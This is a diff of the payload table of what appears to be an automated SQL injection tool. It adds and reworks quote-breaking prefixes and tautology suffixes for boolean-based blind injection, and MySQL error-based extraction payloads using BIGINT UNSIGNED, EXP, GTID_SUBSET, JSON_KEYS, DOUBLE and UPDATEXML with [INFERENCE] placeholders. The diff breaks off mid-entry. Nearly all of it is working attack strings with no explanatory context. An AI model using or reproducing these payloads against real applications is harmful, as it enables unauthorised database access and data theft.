skipped 223 lines 224 224 "comments": [ 225 225 {"pref": " ", "suf": ""}, 226 226 {"pref": " ", "suf": "-- wXyW"}, 227 + {"pref": ") ", "suf": " AND (04586=4586"}, 227 228 {"pref": "' ", "suf": "-- wXyW"}, 228 229 {"pref": '" ', "suf": "-- wXyW"}, 229 - # {"pref": ") ", "suf": "-- wXyW"}, 230 + {"pref": ") ", "suf": "-- wXyW"}, 230 231 {"pref": "') ", "suf": "-- wXyW"}, 231 - # {"pref": '") ', "suf": "-- wXyW"}, 232 - {"pref": " ", "suf": " OR 3 * 2 * 1 =6 - - wXyW "}, 233 - {"pref": "' ", "suf": " OR '1 '='1 - - wXyW "}, 234 - {"pref": '" ', "suf": ' OR "1 "="1 - - wXyW '}, 235 - {"pref": "' ", "suf": " AND '1 '='1 - - wXyW "}, 236 - {"pref": '" ', "suf": ' AND "1 "="1 - - wXyW '}, 237 - # {"pref": ") ", "suf": " OR (1 =1 - - wXyW "}, 238 - # {"pref": ") " , "suf": " AND (1 =1 - - wXyW "}, 239 - # {"pref": "') ", "suf": " OR ( '1 '='1 -- wXyW "}, 240 - # {"pref": '") ', "suf": ' OR ( "1 "="1 -- wXyW '}, 241 - # {"pref": "') ", "suf": " AND ('1'='1-- wXyW"}, 242 - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'}, 232 + {"pref": '") ', "suf": "-- wXyW"}, 233 + {"pref": ") ", "suf": " OR ( 04586 =4586 "}, 234 + {"pref": "') ", "suf": " AND ( '04586 '='4586 "}, 235 + {"pref": '") ', "suf": ' AND ( "04586 "="4586 '}, 236 + {"pref": "' ", "suf": " AND '04586 '='4586 "}, 237 + {"pref": '" ', "suf": ' AND "04586 "="4586 '}, 238 + {"pref": "' ) ", "suf": " OR (' 04586 ' =' 4586 "}, 239 + {"pref": ' ") ' , "suf": ' OR (" 04586 " ="4586 ' }, 240 + {"pref": "' ", "suf": " OR '04586 '='4586 --"}, 241 + {"pref": '" ', "suf": ' OR "04586 "="4586 --'}, 243 242 ], 244 243 "title": "AND boolean-based blind - WHERE or HAVING clause", 245 244 "vector": "AND [INFERENCE]", skipped 9 lines 255 254 {"pref": ") ", "suf": "-- wXyW"}, 256 255 {"pref": "') ", "suf": "-- wXyW"}, 257 256 {"pref": '") ', "suf": "-- wXyW"}, 258 - # {"pref": " ", "suf": " AND 3 * 2 * 1 =6 - - wXyW "}, 259 - # {"pref": "' ", "suf": " OR ' 1 ' =' 1 - - wXyW "}, 260 - # {"pref": '" ' , "suf": ' OR " 1 " ="1 - - wXyW 
' }, 261 - # {"pref": " ' ", "suf": " AND ' 1 ' =' 1 - - wXyW "}, 262 - # {"pref": ' " ', "suf": ' AND " 1 " ="1 - - wXyW ' }, 263 - # {"pref": ") " , "suf": " OR ( 1 =1 - - wXyW "}, 264 - # {"pref": ") ", "suf": " AND (1 =1 - - wXyW "}, 265 - # {"pref": " ') " , "suf": " OR (' 1 ' =' 1 - - wXyW "}, 266 - # {"pref": '") ' , "suf": ' OR ( " 1 " =" 1 -- wXyW ' }, 267 - # {"pref": "') " , "suf": " AND ( ' 1 ' =' 1 -- wXyW " }, 268 - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'}, 257 + {"pref": ") ", "suf": " AND ( 04586 =4586 "}, 258 + # {"pref": ") ", "suf": " OR ( 04586 =4586 "}, 259 + {"pref": " ') ", "suf": " AND ( ' 04586 ' =' 4586 "}, 260 + {"pref": '") ' , "suf": ' AND ( " 04586 " ="4586 ' }, 261 + {"pref": "' " , "suf": " AND ' 04586 ' =' 4586 "}, 262 + {"pref": ' " ' , "suf": ' AND " 04586 " ="4586 ' }, 263 + # {"pref": "' ) ", "suf": " OR (' 04586 ' =' 4586 "}, 264 + # {"pref": '" ) ' , "suf": ' OR (" 04586 " ="4586 ' }, 265 + # {"pref": " ' ", "suf": " OR ' 04586 ' =' 4586 --" }, 266 + # {"pref": ' " ', "suf": ' OR " 04586 " =" 4586 --' }, 269 267 ], 270 268 "title": "OR boolean-based blind - WHERE or HAVING clause (NOT)", 271 269 "vector": "OR NOT [INFERENCE]", skipped 6 lines 278 276 {"pref": " ", "suf": "-- wXyW"}, 279 277 {"pref": "' ", "suf": "-- wXyW"}, 280 278 {"pref": '" ', "suf": "-- wXyW"}, 281 - # {"pref": ") ", "suf": "-- wXyW"}, 279 + {"pref": ") ", "suf": "-- wXyW"}, 282 280 {"pref": "') ", "suf": "-- wXyW"}, 283 - # {"pref": '") ', "suf": "-- wXyW"}, 284 - {"pref": " ", "suf": " AND 3 * 2 * 1 =6 - - wXyW "}, 285 - {"pref": "' ", "suf": " OR ' 1 ' =' 1 - - wXyW "}, 286 - {"pref": '" ' , "suf": ' OR " 1 " =" 1 - - wXyW '}, 287 - {"pref": "' " , "suf": " AND ' 1 ' ='1 - - wXyW " }, 288 - {"pref": ' " ', "suf": ' AND " 1 " =" 1 - - wXyW '}, 289 - # {"pref": ") " , "suf": " OR ( 1 =1 - - wXyW "}, 290 - # {"pref": ") ", "suf": " AND (1 =1 - - wXyW "}, 291 - # {"pref": " ') " , "suf": " OR (' 1 ' ='1 - - wXyW " }, 292 - # {"pref": ' ") ' , "suf": 
' OR ( " 1 " =" 1 -- wXyW ' }, 293 - # {"pref": "') " , "suf": " AND ( ' 1 ' =' 1 -- wXyW " }, 294 - # {"pref": '") ', "suf": ' AND ("1"="1-- wXyW'}, 281 + {"pref": '") ', "suf": "-- wXyW"}, 282 + {"pref": ") ", "suf": " AND ( 04586 =4586 "}, 283 + {"pref": ") ", "suf": " OR ( 04586 =4586 "}, 284 + {"pref": " ') ", "suf": " AND ( ' 04586 ' ='4586 " }, 285 + {"pref": ' ") ', "suf": ' AND ( " 04586 " =" 4586 '}, 286 + {"pref": "' " , "suf": " AND ' 04586 ' ='4586 " }, 287 + {"pref": ' " ' , "suf": ' AND " 04586 " ="4586 ' }, 288 + {"pref": "' ) ", "suf": " OR (' 04586 ' =' 4586 "}, 289 + {"pref": '" ) ' , "suf": ' OR (" 04586 " =" 4586 '}, 290 + {"pref": "' " , "suf": " OR ' 04586 ' =' 4586 --" }, 291 + {"pref": ' " ', "suf": ' OR " 04586 " =" 4586 --' }, 295 292 ], 296 293 "title": "OR boolean-based blind - WHERE or HAVING clause", 297 294 "vector": "OR [INFERENCE]", skipped 187 lines 485 482 }, 486 483 ], 487 484 "error-based": [ 485 + # { 486 + # "payload": "AND (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 487 + # "comments": [ 488 + # # {"pref": " ", "suf": ""}, 489 + # {"pref": " ", "suf": "-- wXyW"}, 490 + # {"pref": " ", "suf": "#"}, 491 + # # {"pref": "' ", "suf": ""}, 492 + # {"pref": "' ", "suf": "-- wXyW"}, 493 + # {"pref": "' ", "suf": "#"}, 494 + # # {"pref": '" ', "suf": ""}, 495 + # {"pref": '" ', "suf": "-- wXyW"}, 496 + # {"pref": '" ', "suf": "#"}, 497 + # # {"pref": ") ", "suf": ""}, 498 + # {"pref": ") ", "suf": "-- wXyW"}, 499 + # {"pref": ") ", "suf": "#"}, 500 + # # {"pref": "') ", "suf": ""}, 501 + # {"pref": "') ", "suf": "-- wXyW"}, 502 + # {"pref": "') ", "suf": "#"}, 503 + # # {"pref": '") ', "suf": ""}, 504 + # {"pref": '") ', "suf": "-- wXyW"}, 505 + # {"pref": '") ', "suf": "#"}, 506 + # ], 507 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)", 508 + # "vector": "AND (SELECT(!x-~0)FROM(SELECT 
CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 509 + # "dbms": "MySQL", 510 + # }, 511 + # { 512 + # "payload": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 513 + # "comments": [ 514 + # # {"pref": " ", "suf": ""}, 515 + # {"pref": " ", "suf": "-- wXyW"}, 516 + # {"pref": " ", "suf": "#"}, 517 + # # {"pref": "' ", "suf": ""}, 518 + # {"pref": "' ", "suf": "-- wXyW"}, 519 + # {"pref": "' ", "suf": "#"}, 520 + # # {"pref": '" ', "suf": ""}, 521 + # {"pref": '" ', "suf": "-- wXyW"}, 522 + # {"pref": '" ', "suf": "#"}, 523 + # # {"pref": ") ", "suf": ""}, 524 + # {"pref": ") ", "suf": "-- wXyW"}, 525 + # {"pref": ") ", "suf": "#"}, 526 + # # {"pref": "') ", "suf": ""}, 527 + # {"pref": "') ", "suf": "-- wXyW"}, 528 + # {"pref": "') ", "suf": "#"}, 529 + # # {"pref": '") ', "suf": ""}, 530 + # {"pref": '") ', "suf": "-- wXyW"}, 531 + # {"pref": '") ', "suf": "#"}, 532 + # ], 533 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)", 534 + # "vector": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 535 + # "dbms": "MySQL", 536 + # }, 537 + # { 538 + # "payload": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))", 539 + # "comments": [ 540 + # # {"pref": " ", "suf": ""}, 541 + # {"pref": " ", "suf": "-- wXyW"}, 542 + # {"pref": " ", "suf": "#"}, 543 + # # {"pref": "' ", "suf": ""}, 544 + # {"pref": "' ", "suf": "-- wXyW"}, 545 + # {"pref": "' ", "suf": "#"}, 546 + # # {"pref": '" ', "suf": ""}, 547 + # {"pref": '" ', "suf": "-- wXyW"}, 548 + # {"pref": '" ', "suf": "#"}, 549 + # # {"pref": ") ", "suf": ""}, 550 + # {"pref": ") ", "suf": "-- wXyW"}, 551 + # {"pref": ") ", "suf": "#"}, 552 + # # {"pref": "') ", "suf": ""}, 553 + # {"pref": "') ", "suf": "-- wXyW"}, 554 + # {"pref": "') ", "suf": "#"}, 555 + # # {"pref": '") ', "suf": ""}, 556 + # {"pref": '") ', 
"suf": "-- wXyW"}, 557 + # {"pref": '") ', "suf": "#"}, 558 + # ], 559 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)", 560 + # "vector": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))", 561 + # "dbms": "MySQL", 562 + # }, 563 + # { 564 + # "payload": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))", 565 + # "comments": [ 566 + # # {"pref": " ", "suf": ""}, 567 + # {"pref": " ", "suf": "-- wXyW"}, 568 + # {"pref": " ", "suf": "#"}, 569 + # # {"pref": "' ", "suf": ""}, 570 + # {"pref": "' ", "suf": "-- wXyW"}, 571 + # {"pref": "' ", "suf": "#"}, 572 + # # {"pref": '" ', "suf": ""}, 573 + # {"pref": '" ', "suf": "-- wXyW"}, 574 + # {"pref": '" ', "suf": "#"}, 575 + # # {"pref": ") ", "suf": ""}, 576 + # {"pref": ") ", "suf": "-- wXyW"}, 577 + # {"pref": ") ", "suf": "#"}, 578 + # # {"pref": "') ", "suf": ""}, 579 + # {"pref": "') ", "suf": "-- wXyW"}, 580 + # {"pref": "') ", "suf": "#"}, 581 + # # {"pref": '") ', "suf": ""}, 582 + # {"pref": '") ', "suf": "-- wXyW"}, 583 + # {"pref": '") ', "suf": "#"}, 584 + # ], 585 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)", 586 + # "vector": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))", 587 + # "dbms": "MySQL", 588 + # }, 589 + # { 590 + # "payload": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)", 591 + # "comments": [ 592 + # # {"pref": " ", "suf": ""}, 593 + # {"pref": " ", "suf": "-- wXyW"}, 594 + # {"pref": " ", "suf": "#"}, 595 + # # {"pref": "' ", "suf": ""}, 596 + # {"pref": "' ", "suf": "-- wXyW"}, 597 + # {"pref": "' ", "suf": "#"}, 598 + # # {"pref": '" ', "suf": ""}, 599 + # {"pref": '" ', "suf": "-- wXyW"}, 600 + # {"pref": '" ', "suf": "#"}, 601 + # # {"pref": ") ", "suf": ""}, 602 + # {"pref": ") ", "suf": "-- wXyW"}, 603 + # {"pref": ") ", 
"suf": "#"}, 604 + # # {"pref": "') ", "suf": ""}, 605 + # {"pref": "') ", "suf": "-- wXyW"}, 606 + # {"pref": "') ", "suf": "#"}, 607 + # # {"pref": '") ', "suf": ""}, 608 + # {"pref": '") ', "suf": "-- wXyW"}, 609 + # {"pref": '") ', "suf": "#"}, 610 + # ], 611 + # "title": "MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)", 612 + # "vector": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)", 613 + # "dbms": "MySQL", 614 + # }, 615 + # { 616 + # "payload": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)", 617 + # "comments": [ 618 + # # {"pref": " ", "suf": ""}, 619 + # {"pref": " ", "suf": "-- wXyW"}, 620 + # {"pref": " ", "suf": "#"}, 621 + # # {"pref": "' ", "suf": ""}, 622 + # {"pref": "' ", "suf": "-- wXyW"}, 623 + # {"pref": "' ", "suf": "#"}, 624 + # # {"pref": '" ', "suf": ""}, 625 + # {"pref": '" ', "suf": "-- wXyW"}, 626 + # {"pref": '" ', "suf": "#"}, 627 + # # {"pref": ") ", "suf": ""}, 628 + # {"pref": ") ", "suf": "-- wXyW"}, 629 + # {"pref": ") ", "suf": "#"}, 630 + # # {"pref": "') ", "suf": ""}, 631 + # {"pref": "') ", "suf": "-- wXyW"}, 632 + # {"pref": "') ", "suf": "#"}, 633 + # # {"pref": '") ', "suf": ""}, 634 + # {"pref": '") ', "suf": "-- wXyW"}, 635 + # {"pref": '") ', "suf": "#"}, 636 + # ], 637 + # "title": "MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)", 638 + # "vector": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)", 639 + # "dbms": "MySQL", 640 + # }, 641 + # { 642 + # "payload": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))", 643 + # "comments": [ 644 + # # {"pref": " ", "suf": ""}, 645 + # {"pref": " ", "suf": "-- wXyW"}, 646 + # {"pref": " ", "suf": "#"}, 647 + # # {"pref": "' ", "suf": ""}, 648 + # {"pref": "' ", "suf": "-- wXyW"}, 649 + # {"pref": "' ", "suf": "#"}, 650 + # # 
{"pref": '" ', "suf": ""}, 651 + # {"pref": '" ', "suf": "-- wXyW"}, 652 + # {"pref": '" ', "suf": "#"}, 653 + # # {"pref": ") ", "suf": ""}, 654 + # {"pref": ") ", "suf": "-- wXyW"}, 655 + # {"pref": ") ", "suf": "#"}, 656 + # # {"pref": "') ", "suf": ""}, 657 + # {"pref": "') ", "suf": "-- wXyW"}, 658 + # {"pref": "') ", "suf": "#"}, 659 + # # {"pref": '") ', "suf": ""}, 660 + # {"pref": '") ', "suf": "-- wXyW"}, 661 + # {"pref": '") ', "suf": "#"}, 662 + # ], 663 + # "title": "MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)", 664 + # "vector": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))", 665 + # "dbms": "MySQL", 666 + # }, 667 + # { 668 + # "payload": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))", 669 + # "comments": [ 670 + # # {"pref": " ", "suf": ""}, 671 + # {"pref": " ", "suf": "-- wXyW"}, 672 + # {"pref": " ", "suf": "#"}, 673 + # # {"pref": "' ", "suf": ""}, 674 + # {"pref": "' ", "suf": "-- wXyW"}, 675 + # {"pref": "' ", "suf": "#"}, 676 + # # {"pref": '" ', "suf": ""}, 677 + # {"pref": '" ', "suf": "-- wXyW"}, 678 + # {"pref": '" ', "suf": "#"}, 679 + # # {"pref": ") ", "suf": ""}, 680 + # {"pref": ") ", "suf": "-- wXyW"}, 681 + # {"pref": ") ", "suf": "#"}, 682 + # # {"pref": "') ", "suf": ""}, 683 + # {"pref": "') ", "suf": "-- wXyW"}, 684 + # {"pref": "') ", "suf": "#"}, 685 + # # {"pref": '") ', "suf": ""}, 686 + # {"pref": '") ', "suf": "-- wXyW"}, 687 + # {"pref": '") ', "suf": "#"}, 688 + # ], 689 + # "title": "MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)", 690 + # "vector": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))", 691 + # "dbms": "MySQL", 692 + # }, 693 + # { 694 + # "payload": "AND (SELECT(x*1E308)FROM(SELECT 
CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 695 + # "comments": [ 696 + # # {"pref": " ", "suf": ""}, 697 + # {"pref": " ", "suf": "-- wXyW"}, 698 + # {"pref": " ", "suf": "#"}, 699 + # # {"pref": "' ", "suf": ""}, 700 + # {"pref": "' ", "suf": "-- wXyW"}, 701 + # {"pref": "' ", "suf": "#"}, 702 + # # {"pref": '" ', "suf": ""}, 703 + # {"pref": '" ', "suf": "-- wXyW"}, 704 + # {"pref": '" ', "suf": "#"}, 705 + # # {"pref": ") ", "suf": ""}, 706 + # {"pref": ") ", "suf": "-- wXyW"}, 707 + # {"pref": ") ", "suf": "#"}, 708 + # # {"pref": "') ", "suf": ""}, 709 + # {"pref": "') ", "suf": "-- wXyW"}, 710 + # {"pref": "') ", "suf": "#"}, 711 + # # {"pref": '") ', "suf": ""}, 712 + # {"pref": '") ', "suf": "-- wXyW"}, 713 + # {"pref": '") ', "suf": "#"}, 714 + # ], 715 + # "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (DOUBLE)", 716 + # "vector": "AND (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 717 + # "dbms": "MySQL", 718 + # }, 719 + # { 720 + # "payload": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 721 + # "comments": [ 722 + # # {"pref": " ", "suf": ""}, 723 + # {"pref": " ", "suf": "-- wXyW"}, 724 + # {"pref": " ", "suf": "#"}, 725 + # # {"pref": "' ", "suf": ""}, 726 + # {"pref": "' ", "suf": "-- wXyW"}, 727 + # {"pref": "' ", "suf": "#"}, 728 + # # {"pref": '" ', "suf": ""}, 729 + # {"pref": '" ', "suf": "-- wXyW"}, 730 + # {"pref": '" ', "suf": "#"}, 731 + # # {"pref": ") ", "suf": ""}, 732 + # {"pref": ") ", "suf": "-- wXyW"}, 733 + # {"pref": ") ", "suf": "#"}, 734 + # # {"pref": "') ", "suf": ""}, 735 + # {"pref": "') ", "suf": "-- wXyW"}, 736 + # {"pref": "') ", "suf": "#"}, 737 + # # {"pref": '") ', "suf": ""}, 738 + # {"pref": '") ', "suf": "-- wXyW"}, 739 + # {"pref": '") ', "suf": "#"}, 740 + # ], 741 + # "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING 
clause (DOUBLE)", 742 + # "vector": "OR (SELECT(x*1E308)FROM(SELECT CONCAT_WS(0x28,0x33,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 743 + # "dbms": "MySQL", 744 + # }, 488 745 { 489 - "payload": "AND ( SELECT (! x - ~ 0) FROM ( SELECT CONCAT_WS(0x28,0x496e6a65637465647e ,0x72306f746833783439,0x7e454e44 )x ) y )", 746 + "payload": "AND UPDATEXML (0, CONCAT_WS(0x28,0x7e ,0x72306f746833783439,0x7e ), 0 )", 490 747 "comments": [ 491 748 # {"pref": " ", "suf": ""}, 492 749 {"pref": " ", "suf": "-- wXyW"}, 750 + {"pref": " ", "suf": "#"}, 493 751 # {"pref": "' ", "suf": ""}, 494 752 {"pref": "' ", "suf": "-- wXyW"}, 753 + {"pref": "' ", "suf": "#"}, 495 754 # {"pref": '" ', "suf": ""}, 496 755 {"pref": '" ', "suf": "-- wXyW"}, 756 + {"pref": '" ', "suf": "#"}, 497 757 # {"pref": ") ", "suf": ""}, 498 758 {"pref": ") ", "suf": "-- wXyW"}, 759 + {"pref": ") ", "suf": "#"}, 499 760 # {"pref": "') ", "suf": ""}, 500 761 {"pref": "') ", "suf": "-- wXyW"}, 762 + {"pref": "') ", "suf": "#"}, 501 763 # {"pref": '") ', "suf": ""}, 502 764 {"pref": '") ', "suf": "-- wXyW"}, 765 + {"pref": '") ', "suf": "#"}, 503 766 ], 504 - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED )", 505 - "vector": "AND ( SELECT (! 
x - ~ 0) FROM ( SELECT CONCAT_WS(0x28,0x496e6a65637465647e ,[INFERENCE],0x7e454e44 )x ) y )", 767 + "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML )", 768 + "vector": "AND UPDATEXML (0, CONCAT_WS(0x28,0x7e ,[INFERENCE],0x7e ), 0 )", 506 769 "dbms": "MySQL", 507 770 }, 508 771 { 509 - "payload": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)x)y)", 772 + "payload": "AND UPDATEXML(0,CONCAT_WS('r0oth3x49'),0)", 510 773 "comments": [ 511 774 # {"pref": " ", "suf": ""}, 512 775 {"pref": " ", "suf": "-- wXyW"}, 776 + {"pref": " ", "suf": "#"}, 513 777 # {"pref": "' ", "suf": ""}, 514 778 {"pref": "' ", "suf": "-- wXyW"}, 779 + {"pref": "' ", "suf": "#"}, 515 780 # {"pref": '" ', "suf": ""}, 516 781 {"pref": '" ', "suf": "-- wXyW"}, 782 + {"pref": '" ', "suf": "#"}, 517 783 # {"pref": ") ", "suf": ""}, 518 784 {"pref": ") ", "suf": "-- wXyW"}, 785 + {"pref": ") ", "suf": "#"}, 519 786 # {"pref": "') ", "suf": ""}, 520 787 {"pref": "') ", "suf": "-- wXyW"}, 788 + {"pref": "') ", "suf": "#"}, 521 789 # {"pref": '") ', "suf": ""}, 522 790 {"pref": '") ', "suf": "-- wXyW"}, 791 + {"pref": '") ', "suf": "#"}, 523 792 ], 524 - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED )", 525 - "vector": "OR (SELECT(!x-~0)FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)x)y)", 526 - "dbms": "MySQL", 527 - }, 528 - { 529 - "payload": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))", 530 - "comments": [ 531 - # {"pref": " ", "suf": ""}, 532 - {"pref": " ", "suf": "-- wXyW"}, 533 - # {"pref": "' ", "suf": ""}, 534 - {"pref": "' ", "suf": "-- wXyW"}, 535 - # {"pref": '" ', "suf": ""}, 536 - {"pref": '" ', "suf": "-- wXyW"}, 537 - # {"pref": ") ", "suf": ""}, 538 - {"pref": ") ", "suf": "-- wXyW"}, 539 - # {"pref": "') ", "suf": ""}, 540 - {"pref": "') ", "suf": "-- wXyW"}, 541 - # 
{"pref": '") ', "suf": ""}, 542 - {"pref": '") ', "suf": "-- wXyW"}, 543 - ], 544 - "title": "MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)", 545 - "vector": "AND EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))", 546 - "dbms": "MySQL", 547 - }, 548 - { 549 - "payload": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)e)x))", 550 - "comments": [ 551 - # {"pref": " ", "suf": ""}, 552 - {"pref": " ", "suf": "-- wXyW"}, 553 - # {"pref": "' ", "suf": ""}, 554 - {"pref": "' ", "suf": "-- wXyW"}, 555 - # {"pref": '" ', "suf": ""}, 556 - {"pref": '" ', "suf": "-- wXyW"}, 557 - # {"pref": ") ", "suf": ""}, 558 - {"pref": ") ", "suf": "-- wXyW"}, 559 - # {"pref": "') ", "suf": ""}, 560 - {"pref": "') ", "suf": "-- wXyW"}, 561 - # {"pref": '") ', "suf": ""}, 562 - {"pref": '") ', "suf": "-- wXyW"}, 563 - ], 564 - "title": "MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)", 565 - "vector": "OR EXP(~(SELECT*FROM(SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)e)x))", 566 - "dbms": "MySQL", 567 - }, 568 - { 569 - "payload": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)", 570 - "comments": [ 571 - # {"pref": " ", "suf": ""}, 572 - {"pref": " ", "suf": "-- wXyW"}, 573 - # {"pref": "' ", "suf": ""}, 574 - {"pref": "' ", "suf": "-- wXyW"}, 575 - # {"pref": '" ', "suf": ""}, 576 - {"pref": '" ', "suf": "-- wXyW"}, 577 - # {"pref": ") ", "suf": ""}, 578 - {"pref": ") ", "suf": "-- wXyW"}, 579 - # {"pref": "') ", "suf": ""}, 580 - {"pref": "') ", "suf": "-- wXyW"}, 581 - # {"pref": '") ', "suf": ""}, 582 - {"pref": '") ', "suf": "-- wXyW"}, 583 - ], 584 - "title": "MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)", 585 - "vector": "AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)", 586 - "dbms": "MySQL", 587 - }, 588 - { 
589 - "payload": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)", 590 - "comments": [ 591 - # {"pref": " ", "suf": ""}, 592 - {"pref": " ", "suf": "-- wXyW"}, 593 - # {"pref": "' ", "suf": ""}, 594 - {"pref": "' ", "suf": "-- wXyW"}, 595 - # {"pref": '" ', "suf": ""}, 596 - {"pref": '" ', "suf": "-- wXyW"}, 597 - # {"pref": ") ", "suf": ""}, 598 - {"pref": ") ", "suf": "-- wXyW"}, 599 - # {"pref": "') ", "suf": ""}, 600 - {"pref": "') ", "suf": "-- wXyW"}, 601 - # {"pref": '") ', "suf": ""}, 602 - {"pref": '") ', "suf": "-- wXyW"}, 603 - ], 604 - "title": "MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)", 605 - "vector": "OR GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44),1337)", 606 - "dbms": "MySQL", 607 - }, 608 - { 609 - "payload": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))", 610 - "comments": [ 611 - # {"pref": " ", "suf": ""}, 612 - {"pref": " ", "suf": "-- wXyW"}, 613 - # {"pref": "' ", "suf": ""}, 614 - {"pref": "' ", "suf": "-- wXyW"}, 615 - # {"pref": '" ', "suf": ""}, 616 - {"pref": '" ', "suf": "-- wXyW"}, 617 - # {"pref": ") ", "suf": ""}, 618 - {"pref": ") ", "suf": "-- wXyW"}, 619 - # {"pref": "') ", "suf": ""}, 620 - {"pref": "') ", "suf": "-- wXyW"}, 621 - # {"pref": '") ', "suf": ""}, 622 - {"pref": '") ', "suf": "-- wXyW"}, 623 - ], 624 - "title": "MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)", 625 - "vector": "AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,[INFERENCE],0x7e454e44)) USING utf8)))", 626 - "dbms": "MySQL", 627 - }, 628 - { 629 - "payload": "OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44)) USING utf8)))", 630 - "comments": [ 631 - # {"pref": " ", "suf": ""}, 632 - {"pref": " ", "suf": "-- wXyW"}, 633 - # {"pref": "' ", "suf": ""}, 634 - 
